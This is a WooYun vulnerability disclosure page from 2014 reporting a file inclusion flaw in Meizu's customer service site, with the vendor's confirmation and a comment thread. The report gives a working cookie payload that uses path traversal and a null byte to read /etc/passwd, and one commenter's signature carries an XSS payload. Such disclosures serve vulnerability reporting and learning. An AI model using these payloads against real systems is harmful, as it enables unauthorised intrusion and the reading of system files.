当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(20) 关注此漏洞

缺陷编号: WooYun-2014-75335

漏洞标题: 魅族客服任意文件包含漏洞

相关厂商: 魅族科技

漏洞作者: mango

提交时间: 2014-09-07 11:16

公开时间: 2014-10-22 11:18

漏洞类型: 命令执行

危害等级: 高

自评Rank: 20

漏洞状态: 厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 无

6人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-09-07: 细节已通知厂商并且等待厂商处理中
2014-09-08: 厂商已经确认,细节仅向厂商公开
2014-09-18: 细节向核心白帽子及相关领域专家公开
2014-09-28: 细节向普通白帽子公开
2014-10-08: 细节向实习白帽子公开
2014-10-22: 细节向公众公开

简要描述:

详细说明:

http://kf.meizu.com/login.php



修改cookie



code 区域
Cookie: customer_service_language=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00



0~EY@6IZY9M}G69XY1EQ32Q.jpg

漏洞证明:

@NX`(FB(E])T[JDMZGUI[9U.jpg

修复方案:

版权声明:转载请注明来源 mango@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-09-08 20:29

厂商回复:

谢谢反馈漏洞已经知悉,并在第一时间会予以修复,谢谢!

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评价

  1. 2014-09-30 10:56 | U神 ( 核心白帽子 | Rank:1360 漏洞数:150 | 乌云核心菜鸟,联盟托管此号中,欢迎加入08...)
    0

    53客服包含漏洞一枚!http://www.shangxueba.com/jingyan/1640807.html

  2. 2014-10-22 15:48 | Mody ( 普通白帽子 | Rank:110 漏洞数:27 | "><img src=x onerror=alert(1);> <img s...)
    0

    这是怎嘛发现的啊,好屌!

  3. 2014-10-22 16:48 | Neeke ( 普通白帽子 | Rank:110 漏洞数:26 | 额滴歌神呀!)
    0

    @Mody 目测AWVS扫的

  4. 2014-10-22 17:53 | 进击的zjx ( 普通白帽子 | Rank:1589 漏洞数:201 )
    1

    学习了

  5. 2014-10-22 17:55 | 进击的zjx ( 普通白帽子 | Rank:1589 漏洞数:201 )
    0

    请教下写几个../../是随便的吗?还是有啥讲究?看你写了十个。。。@mango

  6. 2014-10-22 19:50 | Aug0st ( 普通白帽子 | Rank:227 漏洞数:48 | do)
    0

    @进击的zjx 你可以在linux终端下输入cd ../../../../../../../../../ 看下

  7. 2014-10-22 23:50 | mango ( 核心白帽子 | Rank:2081 漏洞数:303 | 解决问题的第一步,是要承认问题的存在。)
    0

    @Neeke 不是 是看之前这个cms有漏洞就试试了 http://www.shangxueba.com/jingyan/1640807.html

  8. 2014-10-23 09:50 | 进击的zjx ( 普通白帽子 | Rank:1589 漏洞数:201 )
    0

    @Aug0st @mango 额。里面没讲为何10个../

  9. 2014-10-23 10:03 | U神 ( 核心白帽子 | Rank:1360 漏洞数:150 | 乌云核心菜鸟,联盟托管此号中,欢迎加入08...)
    0

    @Neeke 没看到我的第一条评论吗?这是53客服通用包含漏洞

  10. 2014-10-23 10:05 | 进击的zjx ( 普通白帽子 | Rank:1589 漏洞数:201 )
    0

    @U神 U神请教下为何是10个../ 有讲究吗?

  11. 2014-10-23 10:08 | U神 ( 核心白帽子 | Rank:1360 漏洞数:150 | 乌云核心菜鸟,联盟托管此号中,欢迎加入08...)
    0

    @进击的zjx 一般来说没什么讲究,因为有时候不知道要跳几级目录才能跳到根目录,所以你测试的时候可以一个加一个地测试

  12. 2014-10-23 10:31 | 进击的zjx ( 普通白帽子 | Rank:1589 漏洞数:201 )
    1

    @U神 谢谢,了解了。。是不是如果5个../跳到根目录,那10个../肯定也是可以的吧,所以就是说测试时不如多写几个

  13. 2014-10-23 11:40 | Neeke ( 普通白帽子 | Rank:110 漏洞数:26 | 额滴歌神呀!)
    0

    @U神 目测不准啊 - -#

  14. 2014-10-23 20:53 | Mody ( 普通白帽子 | Rank:110 漏洞数:27 | "><img src=x onerror=alert(1);> <img s...)
    1

    @U神 U神你好叼

登录后才能发表评论,请先 登录